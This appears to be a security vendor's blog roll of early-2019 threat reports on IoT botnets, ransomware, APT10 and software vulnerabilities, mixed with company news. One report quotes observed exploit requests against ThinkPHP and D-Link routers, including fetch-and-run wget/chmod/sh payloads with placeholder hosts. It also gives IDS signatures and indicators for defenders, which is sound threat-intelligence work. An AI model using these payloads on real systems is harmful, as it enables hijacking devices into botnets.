When threat actors are considering a campaign, one of the things that must be closely considered is where will the payload be hosted? In malspam campaigns, attackers have an option to include an attachment, but many security solutions scan email for suspicious attachments or strip attachments altogether. For threat actors concerned with their attachments not making it through security controls, they have a choice to include a link and hope they can lure the user into clicking the link, downloading the malicious file, and executing it.

In a recent campaign, researchers observed a familiar lure to download some malicious software PACKING LIST AND LPO DOC.exe, but this malicious software masquerading as a document was being hosted on Microsoft’s OneDrive. This points out some pain for the blue team. Some valid observables here include a Microsoft IP, a Microsoft domain, and a Microsoft URL. Yes, they are valid observables for this campaign, but if you try to use the Microsoft IP and domain as an indicator you will end up with an extremely high ratio of false positive alerts. The best indicators here are the file hash, the dynamic DNS host name, and any IPs not related to Microsoft.










Chinese ransomware authors move to Russia for reliability

The ransomware author responsible for FilesL0cker Ransomware is jumping ship. Based on discussion from (the Russian forum where Gandcrab was born) the actor said they are moving away from their own ransomware due to technical issues in favor of GandCrab ransomware. The underlying issue is that FilesL0cker could prevent decryption of an infected host’s data even after obtaining the decryption key.

This sounds like a bug in the software that the author cannot figure out. And, it is understandable why it is a concern for the authors. People have learned to pay ransom because they can trust that the files will be decrypted. If your ransomware is not reliably decrypting even with the correct key then you have unhappy customers that tell others, your ransomware will get a reputation, and people will stop paying the ransom. The threat actor’s wallet is probably already feeling the pain of unpaid infections because they understand their Net Promoter Score(NPS) has seriously tanked. I wouldn’t be surprised if FilesL0cker is pretty much doomed at this point. We should expect a rebranding under a FilesL0cker/Gandcrab variant.

Go-lang brute-forcer targets Magento E-commerce sites

E-commerce websites are regularly targeted by online criminals for multiple reasons. Recently, attacks have been conducted via skimmer, which is a piece of code that is either directly injected into a hacked site or referenced externally. This is similar to attacks carried out by the Magecart threat actor we have previously written about. The purpose of this skimmer is to watch for user input, in particular around online shopping carts, and send the perpetrators that data, such as credit card numbers and passwords, in clear text.

Compromising e-commerce sites can be achieved in more than one way. Vulnerabilities in popular Content Management Systems like Magento, as well as in various plugins are commonly exploited these days. But because many website owners still use weak passwords, brute force attacks are a viable option. A recent campaign shows evidence of this. Researchers have discovered a new golang brute forcing malware that focuses in on Magento, phpMyAdmin, and cPanel. A number of Magento sites have been compromised and skimmers have been installed. For an in-depth analysis of this threat check out the research from Malwarebytes.

Two critical patches for Adobe Reader and Acrobat

On February 12, 2019, Adobe released a security patch addressing CVE-2019-7089 in Adobe Reader that can be triggered via a malicious PDF to perform a SMB call-back, revealing an NTLMv2 hash. This could lead to a breach of an organization or a single user.

On February 21, 2019, another vulnerability had been discovered, tracked as CVE-2019-7815 affecting Adobe Acrobat and Reader versions 2019.010.20098. Adobe disclosed the first flaw which raised the risk of an exploit, while the second version looking to exploit the first issue might stumble across it. Users should keep software up to date with timely patches to prevent exploitation. An in-depth technical analysis from researchers is available.

Perch Security Lands Cybersecurity Gold

Perchy on February 25, 2019

Perch Security has been awarded with multiple achievements in the 2019 Cybersecurity Excellence Awards. This is the second year in a row Perch Security placed, outperforming last year in every eligible category.

Perch Security placed as the:

  • Gold Winner for Security Monitoring
  • Gold Winner for Intrusion Detection & Prevention
  • Silver Winner for Best Cybersecurity Startup (between 10 and 49 employees)
  • Silver Winner for Threat Detection, Intelligence and Response

“Congratulations to Perch Security for being recognized as the gold winner in the product categories Security Monitoring and Intrusion Detection & Prevention, as a silver winner in the category Threat Detection, Intelligence and Response, and as a silver winner in the Best Cybersecurity Startup category of the 2019 Cybersecurity Excellence Awards,” said Holger Schulze, CEO of Cybersecurity Insiders and founder of the 400,000-member Information Security Community on LinkedIn that co-produces the awards program. “With over 500 entries in more than 90 award categories, the 2019 awards are highly competitive, and all winners truly reflect the very best in today’s cybersecurity industry.”

Perch consumes and automates your threat intelligence and uses it to detect any sign of threat lurking on your network, while our Security Operations Center (SOC) analyzes any detected signs of cyber threat activity. Customers are notified immediately of any validated threat activity on networks they manage.

Interested in learning more about Perch Security? Visit us online, send us a Slack, or Tweet.

Threat Report Friday February 22nd 2019

on February 22, 2019

This week we’re breaking from our regular coverage to bring you a follow up from Perch security researchers. We’ve got a lot of malware related information to highlight some active botnets and possible relationships between various strains. Additionally, we provide details on two recently spun up malware campaigns that are making waves.

Cayosin gets a Tsunami of an Update

On February 3, 2019 we broke the news about an emerging botnet, Cayosin. We observed Cayosin ramping up on Janaury 7, 2019 and linked it to an Instagram account where the author announced finishing the malware on the same date. That Instagram has since been abandoned, however we learned that Cayosin source code was available for sale because the malware author was ready to spin up a new version of Cayosin with new features, Cayosin v3. So, keep your eyes peeled for signs of a new version.

While researching Cayosin, we found indicators of other malicious botnets likely deployed by the same group of actors. Some of the bots are still active while others have gone dormant. We mentioned it briefly in our first report, and in the follow up with Dark Reading we linked Cayosin and Yowai together. But, we left the details light while we sifted through information.

As a result of our research, Perch tracked down over twenty active botnets that all target command execution vulnerabilities in Linux IoT devices, routers, and Web applications. Some of these are new and some have been previously reported on.

We believe Cayosin, Kowai, Yowai, Infinity, Corona, Cock, and Tsunami (aka Kaiten) are likely to be related to the same group. One of the most active pieces of malware we found was a version of Tsunami that was likely recycled by the group, or maybe the original coverage of Tsunami is related as well. While others like Rift, lessie, Okiru, Hentai, Solstice, Damien, Cakle, Solar, LMAO, Sefa, Karu, Hakai, Gemini, Trinity, Ronin, xd, Shaolin, and Yakuza may just share similar characteristics. Over the last 30 days, consistent activity from all of these botnets is like background radiation, but if you look close enough you can see when each started.

30 days of botnet activity

Status: Active 

First Observed: 2019-01-06 

Kowai v1 

Status: Inactive 

Last Observed: 2019-01-20 

SHA256: 284269344b15afe2fe74cf79129c4b69493a9bdbff8ea9dff9e97f23b4923054 


Status: Active 

First Observed: 2019-01-12 

SHA256: dc372ee5f8ce6e57f7ffb990ea15bcd737809fc59a9c7af5bcdbaba2cc959fc2 

MD5: 9472bd51a84eaa37ed7e336e3fe05180 

Tsunami (Kaiten)  

Status: Active 

First Observed: 2019-01-21 
Sha256: 127ab7ed62a506fa7b0dab479f2e15b48da0d0a6d1504488d735c74dfb7bce5f 


Status: Active 

First Observed: 2019-01-25 


Status: Active 

First Observed: 2019-01-27 

Filename: cock.x86 

Hash: 9195f6c305cfe1c426d4a37365a6b7e7fbf5535742be59b5bd7fbefc937c3ddd  

MD5: 3d3982d64ec4248aaa0338dd3de76ab2  

We found these botnets by correlating similar exploit payloads, http request metadata, and source IP addresses. What we found was that a large number of initial scans were from the subnet, which belongs to KV Solutions, a Virtual Private Server (VPS) provider in the Netherlands. We’re not the first to notice KV Solutions. If you check out their reviews on Google, you’ll see KV Solutions getting called out by a possible victim for ignoring malicious activity on their network.

Negative review for KV Solutions

Tinfoil hat time, maybe the translation is bad. Maybe, the Wiz meant that hackers in Oekranie (Ukraine) use KV Solutions because they allow unscrupulous customers. Once we focused on traffic coming from KV Solutions, we found a flood of threat indicators pouring out of their network. Most of the HTTP exploit payloads contained an HTTP user-agent consisting of a single word (the malware name) follow by “/1.0” or “/2.0.” This info helped us find additional hosts serving up the second stage payloads, which are typically but not exclusively hosted on a KV solutions IP.

After retrieving the second stage binary, the Linux host is infected and adds itself to whatever botnet landed an infection. The infected host will begin scanning, DDoS’ing, and exploiting other hosts on command. Based on data from for the KV Solutions netblock, 149 of the 254 possible IPs have at least one abuse complaint against them. The earliest reported abuse complaint we reviewed was early-mid 2018.

There is no indication that KV Solutions is involved in this activity. It is possible that they are unaware of active threats in their network. When KV Solutions Abuse contact was notified of an abuse complaint on Kowai via URLHaus, they took down the Tsunami binaries in 16 hours. That’s better than the 10 days it took digital ocean to take down Kowai 1.0 binaries. Regardless of the binaries being offline, there are still a large number of actively infected hosts that are still connected to a command control. That means the attackers can still pivot the infected hosts with an update or just re-infect them with entirely new malware. We did see that the threat actors are selling and sharing IP lists from previous runs so they can build up their botnets faster.

Here are some popular examples of scanning attacks we saw raining across the World Wide Web:

ThinkPHP 5.x Remote Code Execution 

GET /index.php?s=/index/.hink.pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://<ip>/<path to file|<file> -O /tmp/<tmp name>; chmod 777 /tmp/<tmp name>; /tmp/<name> <execute>' 

D-Link Router DSL-2750B OS Command Injection 

GET /login.cgi?cli=aa%20aa%27;wget%20http://<ip>/<path>|<file>%20-O%20-%3E%20/tmp/<file>;sh%20/tmp/<file>%27$ 

Linksys Router E-Series Remote Code Execution 

POST /tmUnblock.cgi 


GPON Router Authentication Bypass & Remote Code Execution 

POST /GponForm/diag_Form?images/ 


Kowai cracks open two thousand Linux hosts in first two hours

The name of the botnet and second stage binary change, but the exploits have stayed the same over the years. The exploit activity against these vulnerabilities is not new and will not be gone any time soon, but at least Perch can drip feed some visibility to other blue teamers.

Some say that Netis Netcore vulnerable hosts are all gone now or blocked by carriers, but maybe actors were not scanning the right networks for vulnerable hosts. On February 9, 2019 at approximately 7 p.m. CST, a new version of Kowai came online and started making waves, infecting 2,000 hosts in the first two hours of operation. To validate this, look for a spike of traffic on port 53413 around this time. Don’t confuse this with the earlier version of Kowai. We believe that was just a beta test that was forgotten and put aside.

Over the last 30 days, we have observed 22 HTTP User-Agents used by different botnets performing similar attacks. We have broken into Melty’s stash of signatures and included some for these User-Agents at the end of this report.









Hello, World 














U.S. gets Rekt by botnet targeting Elastic, Redis, Oracle, and Asterisk

Not all emerging malware botnets make themselves as obvious. One payload caught our eye because it used a different technique that was a little stealthier. Instead of immediately giving away the second stage payload location, they probe for a vulnerability before trying an exploit. This effectively keeps them from showing their cards and having their infrastructure shutdown. Looking back, the campaign was first observed on January 18, 2019 with a single event targeting the U.S. from Australia. Then It was just a handful of events from Asia and Europe. It looks like Rekt has pivoted to the United States and we’re seeing tons of scan related activity. One indicator we observed was HTTP requests with an eight-year-old Firefox User-Agent, “Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)”

Since it started, we’ve identified nearly 3,000 scanning IPs. That’s just a tip of the iceberg. This botnet could control over 30,000 scanning IPs.

Rekt botnet activity

The HTTP requests were consistently looking for target URLs like “/TP/public/index.php”, “/TP/index.php”, “/thinkphp/html/public/index.php”, “/TP/html/public/index.php”, “/html/public/index.php”, “/public/index.php”, and last but not least “/elrekt.php”

The ThinkPHP scanning looks very familiar to other scanning activity but instead of going for the kill and executing PHP code immediately to infect the host, the malware probes for a response from phpinfo. This keeps the target from knowing the location of the second stage binary. It also appears that the distribution of second stage binaries are distributed and not centralized. This will will make it much harder to shut down. We have found no other valid traffic to elrekt.php and Googling elrekt php returns little results. This could be a webshell that gets implanted on the webserver after exploitation or some unknown vulnerable software. It’s fun to say, so we’ve started calling this Rekt.

In addition to looking for Linux code execution vulnerabilities in Web applications, Rekt looks for open and vulnerable services. Based on the ports that are actively being scanned, it is looking for open Redis servers, Elastic servers, Asterisk Web GUIs, and Oracle Web Logic Server. Presumably if it found an open server it would probe for vulnerability and then attempt exploit there too. Happy hunting!

IDS Signatures

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"[Melty] User-Agent Yowai Botnet User-Agent Observed"; flow:established,to_server; content:"Yowai/2.0"; http_user_agent; nocase; depth:9; fast_pattern; isdataat:!1,relative; classtype:trojan-activity; sid:9000003; rev:1;) 

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"[Melty] User-Agent Tsunami Botnet User-Agent Observed"; flow:established,to_server; content:"Tsunami/2.0"; http_user_agent; nocase; depth:11; fast_pattern; isdataat:!1,relative; classtype:trojan-activity; sid:9000004; rev:1;) 

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"[Melty] User-Agent Kowai Botnet User-Agent Observed"; flow:established,to_server; content:"Kowai/2.0"; http_user_agent; nocase; depth:9; fast_pattern; isdataat:!1,relative; classtype:trojan-activity; sid:9000005; rev:1;) 

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"[Melty] User-Agent Yakuza Botnet User-Agent Observed"; flow:established,to_server; content:"Yakuza/2.0"; http_user_agent; nocase; depth:10; fast_pattern; isdataat:!1,relative; classtype:trojan-activity; sid:9000006; rev:1;) 

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"[Melty] User-Agent Rift Botnet User-Agent Observed"; flow:established,to_server; content:"Rift/2.0"; http_user_agent; nocase; depth:8; fast_pattern; isdataat:!1,relative; classtype:trojan-activity; sid:9000007; rev:1;) 

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"[Melty] User-Agent lessie Botnet User-Agent Observed"; flow:established,to_server; content:"lessie/2.0"; http_user_agent; nocase; depth:10; fast_pattern; isdataat:!1,relative; classtype:trojan-activity; sid:9000008; rev:1;) 

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"[Melty] User-Agent Hakai Botnet User-Agent Observed"; flow:established,to_server; content:"Hakai/2.0"; http_user_agent; nocase; depth:9; fast_pattern; isdataat:!1,relative; classtype:trojan-activity; sid:9000009; rev:1;) 

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"[Melty] User-Agent Hentai Botnet User-Agent Observed"; flow:established,to_server; content:"Hentai/2.0"; http_user_agent; nocase; depth:10; fast_pattern; isdataat:!1,relative; classtype:trojan-activity; sid:9000010; rev:1;) 

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"[Melty] User-Agent Solstice Botnet User-Agent Observed"; flow:established,to_server; content:"Solstice/2.0"; http_user_agent; nocase; depth:12; fast_pattern; isdataat:!1,relative; classtype:trojan-activity; sid:9000011; rev:1;) 

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"[Melty] User-Agent Damien Botnet User-Agent Observed"; flow:established,to_server; content:"Damien/2.0"; http_user_agent; nocase; depth:10; fast_pattern; isdataat:!1,relative; classtype:trojan-activity; sid:9000012; rev:1;) 

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"[Melty] User-Agent Cakle Botnet User-Agent Observed"; flow:established,to_server; content:"Cakle/2.0"; http_user_agent; nocase; depth:9; fast_pattern; isdataat:!1,relative; classtype:trojan-activity; sid:9000013; rev:1;) 

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"[Melty] User-Agent Solar Botnet User-Agent Observed"; flow:established,to_server; content:"Solar/2.0"; http_user_agent; nocase; depth:9; fast_pattern; isdataat:!1,relative; classtype:trojan-activity; sid:9000014; rev:1;) 

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"[Melty] User-Agent LMAO Botnet User-Agent Observed"; flow:established,to_server; content:"LMAO/2.0"; http_user_agent; nocase; depth:8; fast_pattern; isdataat:!1,relative; classtype:trojan-activity; sid:9000015; rev:1;) 

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"[Melty] User-Agent Gemini Botnet User-Agent Observed"; flow:established,to_server; content:"Gemini/2.0"; http_user_agent; nocase; depth:10; fast_pattern; isdataat:!1,relative; classtype:trojan-activity; sid:9000016; rev:1;) 

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"[Melty] User-Agent Trinity Botnet User-Agent Observed"; flow:established,to_server; content:"Trinity/2.0"; http_user_agent; nocase; depth:11; fast_pattern; isdataat:!1,relative; classtype:trojan-activity; sid:9000017; rev:1;) 

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"[Melty] User-Agent Ronin Botnet User-Agent Observed"; flow:established,to_server; content:"Ronin/2.0"; http_user_agent; nocase; depth:9; fast_pattern; isdataat:!1,relative; classtype:trojan-activity; sid:9000018; rev:1;) 

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"[Melty] User-Agent Karu Botnet User-Agent Observed"; flow:established,to_server; content:"Karu/2.0"; http_user_agent; nocase; depth:8; fast_pattern; isdataat:!1,relative; classtype:trojan-activity; sid:9000019; rev:1;) 

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"[Melty] User-Agent xd Botnet User-Agent Observed"; flow:established,to_server; content:"xd/2.0"; http_user_agent; nocase; depth:6; fast_pattern; isdataat:!1,relative; classtype:trojan-activity; sid:9000020; rev:1;) 

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"[Melty] User-Agent Shaolin Botnet User-Agent Observed"; flow:established,to_server; content:"Shaolin/1.0"; http_user_agent; nocase; depth:11; fast_pattern; isdataat:!1,relative; classtype:trojan-activity; sid:9000021; rev:1;) 

Spreading the flock culture

on February 19, 2019

Cybersecurity is a quickly evolving industry and is expected to grow to USD 300 billion by 2024. With such a rapidly progressing industry you find new players emerging; one of which is Perch – Perch Security (read with James Bond voice). Although the company is new to the industry, our star-studded lineup is far from it. We have our CEO alone who has a background in founding cybersecurity companies, creating regulations and compliance (including STIX), among many other contributions to the world of cybersecurity.

So, who is Perch?

Perch is your witty, cunning, and innovative cybersecurity company. We offer many things among a SOC, log aggregation, IDS, and more. Perch is versatile and has the capability to serve multiple markets, including the MSP, Enterprise, and SMB.

At Perch we believe in being personable and speaking to you like a human (that’s right, a human). We also don’t believe in using buzzwords and fancy jargon, especially in an industry where terms are not yet well defined and can be convoluted. Therefore, we built a brand and product that is not only comprehensible, but also relatable.

Our staff is held to the same standard – if not higher. When you need customer service, we have an entire team dedicated to the success of your business. Our flock culture doesn’t just spread externally. Each flocker is full of Perchified goodness. Employees of Perch are expected to go beyond the norm and think outside of the box. By adopting this mindset, we are able to push the product further.

The core of Perch

Being relatable and personable are our top priorities. However, our main focus is customer care – not before the sale, no. AFTER the sale. We believe that happy customers drive a business forward. Without customers you have nothing. (Aka a good product doesn’t mean anything without a customer.) We have an entire team dedicated to customers, called our Customer Success team. Our Customer Success team is set up for – you guessed it – your success.

Not only are we built to help you succeed, we take your feedback and turn it into features. We make it our priority to always engage with our customers. We have many different ways to do this, whether it be through communicating with an employee, our monthly user meeting, on a call with a prospect – you name it.

Until next time

Whether you are a part of the flock or stumbled upon this blog via one of our clever Tweets, we hope you find Perch to be a helpful resource or even just a fun group (we prefer both). Stay up-to-date with the latest in cybersecurity via our blog. Follow the flock on social (LinkedIn, Twitter, and Facebook). Or reach out to us anyway you like (Slack, email, or phone).

Tampa Bay Tech Leaders

Perchy on February 15, 2019

Perch Security breaks the mold in just about every way. Their branding is charming and funny – a far departure from the usual techy, serious branding of other threat intelligence companies. We spent an hour with Aharon at Perch HQ and spoke candidly about cyber threats, talent, and our tech community here in lovely Tampa.

Discover the entire story.

Threat Report Thursday February 14th 2019

on February 14, 2019

Alright, what’s up this week? A vulnerability in all Intel chips opens the door for stealthy malware, container hosts beware nothing is safe anymore, adware slays macOS gatekeeper, and a new malware variant exploits your antivirus to steal data.

ROP-Roh, Shaggy

Researchers recently discovered a way to abuse Intel Software Guard eXtensions (SGX) enclaves to hide malicious code from security software. Intel SGX is a feature found in all modern Intel CPUs that allow developers to isolate applications in secure enclaves. The only known vulnerabilities impacting Intel SGX enclaves have been side-channel attacks that leaked the data being processed inside an enclave, but researchers exploited this through return-oriented programming (ROP).

Once executed, Intel Transactional Synchronization eXtensions (TSX) allows the malicious enclave to access a wider set of commands that it is normally entitled to. Researchers note that Intel SGX enclaves could be used as a place to hide undetectable malware.

The researchers released the implementations of the paper “Practical Enclave Malware with Intel SGX” to a Github repository. The repository consists of three parts: tap_claw, egghunter, and demo.

  • TAP + CLAW – Contains the Intel TSX-based primitives to check whether a page is mapped and writable without using syscalls.
  • Egg Hunter – Shows how to use TAP as egg hunter for classical exploits.
  • Demo – Uses TAP + CLAW inside a (malicious) Intel SGX enclave to break ASLR of the host application, create a ROP payload, and mount a simple PoC attack (e.g. create a file in the current directory).

RunC vulnerability Critical for Containers

“RunC” is a command line utility that spawns and runs containers. It is used as the default runtime for Docker, containerd, Podman, and CRI-O. A vulnerability found in RunC, tracked as CVE-2019-5736, allows malicious containers to overwrite the host RunC binary and gain root-level code execution on the host machine.

When the hosts’ root is mapped in the container’s user namespace, the container is vulnerable. Researchers have detected approximately “4,000” Docker daemons which have the vulnerability. Users and organizations were advised to update to the latest releases to prevent any potential attacks. A proof-of-concept was posted on Github by user feexd on February 11, 2017. You might want to run this PoC on a host machine you can promptly throw in a flaming dumpster.

Shlayer slays macOS Gatekeeper to Run Unsigned Code

Carbon Black recently discovered “Shlayer” targeting macOS users and disabling the Gatekeeper protection to run unsigned second stage payloads. Shlayer targets all macOS releases from 10.10.5 up to the latest 10.14.3 and will arrive on the target machines as a legitimate signed Apple developer ID to trick victims.

The threat actor has been using legitimate websites to redirect users to a malicious Flash installer, so this is likely a malvertising campaign. Once the user executes the compromised Flash installer, a malicious “.command” script is launched that downloads additional payloads. The final payload contains adware to run on the compromised machine by disabling the Gatekeeper protection mechanism. Researchers released indicators of compromise on GitHub. We have checked these indicators for all Perch users over the last 30 days. While indicators of compromise were seen there was no sign that a Perch user has been infected by Shlayer. If you want to keep reading about Shalyer, check out this article.

Astaroth Exploits Avast to steal data

Cybereason security firm recently discovered a new Astaroth Trojan campaign targeting Brazil and European countries via antivirus software to steal information and load malicious modules. The Astaroth Trojan campaign was phishing based, gaining momentum towards the end of 2018 and identified in thousands of incidents. Researchers observed the actors executing the exploit through “.7zip” archive delivered to the target in the form of an email message attachment or hyperlinks.

Once executed, the malware connects to a C&C server and exfiltrates information about the infected computer. Then, the last stage of attack uses BITSAdmin to grab a payload from another C&C server. Cybereason also noticed security tools that can be exploited through a malicious module in “aswrundll.exe” and used to gather information on compromised machine, and “uninsooo.exe”, a security solution developed by GAS Technologia, which it will also use to collect personal user information without being detected if Avast is not present on the infected computer. We checked all users over the last 30 days, and we saw no signs of compromise within any of our clients’ data related to the indicators of compromise released with this research. Although the revived campaign is currently targeting South America and Europe, it’s only a matter of time before the campaign pivots to North America. If you want to read more about Astaroth there is a great article here.

Lucky number 77 for Windows

On February 12, 2019, Microsoft released a security update for the IE Zero-Day tracked as CVE-2019-0676 that addresses “77 security flaws” across a wide range of products. Microsoft disclosed the flaw after they detected an exploitation attempt against Microsoft Edge to the Azure IoT SDK. CVE-2019-0676 is a flaw which allows an attacker to test for the presence of files on disk. Microsoft fixed two vulnerabilities in the Server Message Block (SMB) protocol that can lead to remote code execution. Then, a vulnerability affecting the DHCP server component included with Windows Servers and a vulnerability known as PrivExchange. It is unclear at present if the vulnerability has been used by cyber criminals in their operations, but it can compromise your DHCP server with a single packet. Users and organizations were advised to update to the latest security patch to address this vulnerability.


With all this talk of malware and browser exploits, you should check out Malwarebytes’ in-depth review of recent exploit kits used to attack browsers and install malware on end user machines.

Release Notes

February 12, 2019

  • App-wide organization picker
  • New navigation and app layout
  • Shared Perchybana dashboards and visualizations

  • Fix issues with SecurityEventAlert mixed IP types
  • Issues after intel migration
  • Fix links to Perchybana
  • Long sensor names can cause a 500
  • Fixed timeouts on user registration/new user creation
  • Restrict Custom date ranges to maximum of 90 days
  • Fix invite codes to use the organization chosen in the dropdown

Release Notes

February 7, 2019

  • MSSPs can now use Perch SLAs
  • Enhanced performance for Perchybana
  • Enabled Perchybana dashboards and visualizations

  • Stability and performance improvements

Threat Report Wednesday February 6th 2019

on February 6, 2019

This week we learn about APT10’s modus operandi in Operation Cloud Hopper, how U.S. Cyber Command plans to respond to such foreign campaigns, GoDaddy DNS server’s wild ride with GandCrab, and 16 major RDP vulnerabilities.

More details on Stone Panda’s (APT10) Cloud Hopper

A cyber-espionage campaign targeting at least three companies in the United States and Europe between November 2017 and September 2018, was brought to light in data published by Recorded Future and Rapid7. Based on the technical data discovered, they feel highly confident that these incidents were conducted by APT10 (also known as Stone Panda or CVNX) in an effort to gain access to networks and steal valuable intellectual property or gain commercial advantage.

The targeted companies include:

  • IT and business cloud services managed service provider (MSP)
  • An international apparel company
  • A U.S. law firm with strong experience in intellectual property law with clients in the pharmaceutical, technology, electronics, biomedical, and automotive sectors, among others

In all three incidents, the attackers gained access to networks through deployments of Citrix and LogMeIn remote-access software using stolen valid user credentials. We see once again how dangerous password reuse and/or lack of two factor authentication can be.

The attackers then enumerated access and conducted privilege escalation on the victim networks, utilizing DLL sideloading techniques documented in a US-CERT alert on APT10 to deliver malware.

APT10 Indictment

During the Visma intrusion, APT10 deployed RedLeaves malware with command and control (C2) communications encrypted using both RC4 and Salsa20 streaming ciphers. On the two other victim networks, the attackers deployed a unique version of the UPPERCUT (ANEL) backdoor, only used by APT10. The backdoor was deployed using the Notepad++ updater and sideloading of a malicious DLL, as noted in APT10’s targeting of Japanese corporations in July 2018.

The attackers transferred malware and tooling from their C2 using BITSAdmin-scheduled tasks into the ‘C:\ProgramData\temp’ directory on the victim networks. APT10 actors then compressed proprietary data from Visma with WinRAR (deployed by the attackers) and exfiltrated to Dropbox using cURL. The same Dropbox account was accessed by the attackers during the apparel company intrusion. Dropbox was also used to store exfiltrated documents from the third victim, a U.S. law firm, with the files again exfiltrated using identical TTPs and uploaded using cURL for Windows.

APT10 is believed to be the most significant Chinese state-sponsored cyber threat to global corporations known to date. APT10 has conducted a number of accounts since 2016 and we now know they are run by the Chinese intelligence agency, the Ministry of State Security (MSS).

Utilizing actors working for shell companies such as Huaying Haitai Science and Technology Development Co Ltd, the MSS has conducted, “Operation Cloud Hopper,” against managed IT service providers (MSPs) designed to steal intellectual property and enable secondary attacks against their clients. Access to the networks of these third-party service providers grants the MSS the ability to potentially access the networks of hundreds, if not thousands, of corporations around the world. APT10 likely compromised Visma with the primary goal of enabling secondary intrusions onto their client networks, and not of stealing Visma intellectual property.

In all three incidents, APT10 actors used previously acquired legitimate credentials (possibly gained via a third-party supply chain compromise) in order to gain initial access to the law firm and the apparel company.

Transformational hacking moment for U.S. Cyber Command

On February 6, 2019, RealClear released a report for a new aggressive strategy to take down cyber actors due to the high-profile attacks on the United States. And, they’re no longer just playing defense.

Gen. Paul Nakasone, commander of the U.S. Cyber Command, disclosed a “transformational moment” in how the U.S. conducts cyber operations to raise the cost in adversaries incur from attacking the United States. Nakasone did not reveal what the new strategy is, however, he stated that it involves targeting the infrastructure of adversary cyber actors, hurting their ability to target American interests in the virtual world. Nakasone referenced an operation against ISIS by Joint Task Force Ares to take down the communications and propaganda tool for the group.

Nakasone also revealed a partnership between the U.S. Cyber Command and the NSA which helped to secure the 2018 midterm elections against Russian interference. U.S. Cyber Command learned that techniques and tradecraft must evolve to keep pace with adversaries. No indicators of compromise were released with the report.

GandCrab smash and grab with GoDaddy’s help

A large scale of GandCrab ransomware campaign was assisted by a security hole in GoDaddy DNS. GandCrab is a common ransomware family discovered in 2018. Researchers noticed that the exploit was being executed through a compromised DNS system to launch attacks. Once executed, the actors deliver GandCrab ransomware to the compromised targeted system. Researchers disclosed two phishing email themes used in this campaign: DHL Delivers and E-fax messages. We checked over the last 30 days. We saw a few organizations receive these emails. If you were affected, we have reached out to you.

Email domains




































IP addresses



So many RDP vulnerabilities!

Check Point researchers have discovered 25 vulnerabilities with 16 being critical in the commonly used Remote Desktop Protocol (RDP) that would allow a malicious actor to reverse the usual direction of communication and infect the host’s computer. This infection would allow for an intrusion into the host’s network as a whole. And yes, our data confirms that many organizations still allow access to RDP from the outside world.

I can imagine a scenario where someone hijacks the DNS for your RDP servers and infects all the clients that try to connect. But this would be cool for a hack back honey pot too. Which reminds me of Wes’ blog post on forcing the pain back to the bad guys.

In one of the vulnerabilities, when using the “copy & paste” feature while connected to a malicious RDP server, the server can use the shared RDP clipboard to send files to the client’s computer.

As described by the research team, a potential attacker could use this vulnerability in the Remote Desktop Connection to drop arbitrary malicious scripts or programs to a user’s Startup folder, which would be automatically executed during the next reboot of the client computer.

This did not meet the bar for acknowledgement by Microsoft and no patch is planned to be released. Check Point researchers recommend that you turn off shared RDP clipboard while using RDP.

New Botnet Shows Evolution of Tech and Criminal Culture

Perchy on February 5, 2019

When botnet-as-a-service meets social media marketing, you have a threat poised to rapidly spread. That’s precisely what researchers have found in a quickly evolving botnet called Cayosin (Kay-OH-sin), which combines the most dangerous features of multiple previous botnets and makes them available to a broad audience at a low price.

Get the full story.

Threat Report Sunday February 3rd 2019

on February 3, 2019

Tragedy strikes! Cayosin Botnet combines Qbot and Mirai to cause Erradic behavior

Recently, we came across an emerging botnet as-a-service, the Cayosin Botnet. We first observed Cayosin on January 6, 2019, and activity has been ramping up. We have data on 55 scanning IPs, with indicators consistent to attacks built into Cayosin. Based on data from the threat actors, the bot count is over 1,100 as of February 2nd.


Cayosin appears to be created by Erradic, of RyM Tradgedy. Accounts (spots) for Cayosin Botnet are being sold via Instagram by @unholdable and @pumperdumper. A YouTube demo of Cayosin was posted two days after the scanning began. If you watch their Instagram stories, you can get frequent updates on Cayosin’s growth.

Instagram Conversation

Cayosin largely recycles exploits utilized by other botnets, like Mirai, though the injections reference a second stage binary hosted at 185.244.25[.]241 – an IP address not observed among the 55 IPs scanning with the first stage exploit.



Based on reverse engineering of the binaries that unixfreaxjp posted to Imgur, we understand that the codebase of Cayosin shares characteristics with Torlus/Qbot/Lizkebab. 185.244.25[.]241 was scanning, but primarily for open telnet services. 185.244.25[.]241 is a Netherlands VPS that is serving two binaries we recovered. Once the second stage infection is executed on a vulnerable host, the host will reach out to hostnamepxssy[.]club.

Perchybana Activity

On January 26, 2019, we saw a change in behavior and some of the IPs were scanning with a new user-agent, “Cock/2.0” instead of “Cayosin/2.0”. This change in behavior may have something to do with a customer service dispute that led to the source code of Cayosin being posted on pastebin. We were unable to find that pastebin post, but it could have prompted a new build of the botnet.

This is not the team’s first tool. They have created a few along the way like Summit, Tragic, and about a dozen others. You can learn more about these tools by following the various Instagram accounts of the crew. They seem interested in building tools to DDoS and boast about taking down services with OVH, Choopa, NFO – and if the hype is real, maybe even Rocket League servers.


  - Cayosin/2.0
  - Cock/2.0

First stage IPs

  - 101.255.95[.]34

  - 103.102.133[.]11

  - 103.113.156[.]46

  - 103.24.104[.]98

  - 103.62.152[.]58

  - 104.185.20[.]41

  - 113.11.154[.]162

  - 114.108.229[.]59

  - 115.127.103[.]132

  - 115.127.103[.]139

  - 115.127.5[.]244

  - 117.102.69[.]124

  - 117.102.69[.]125

  - 117.102.69[.]126

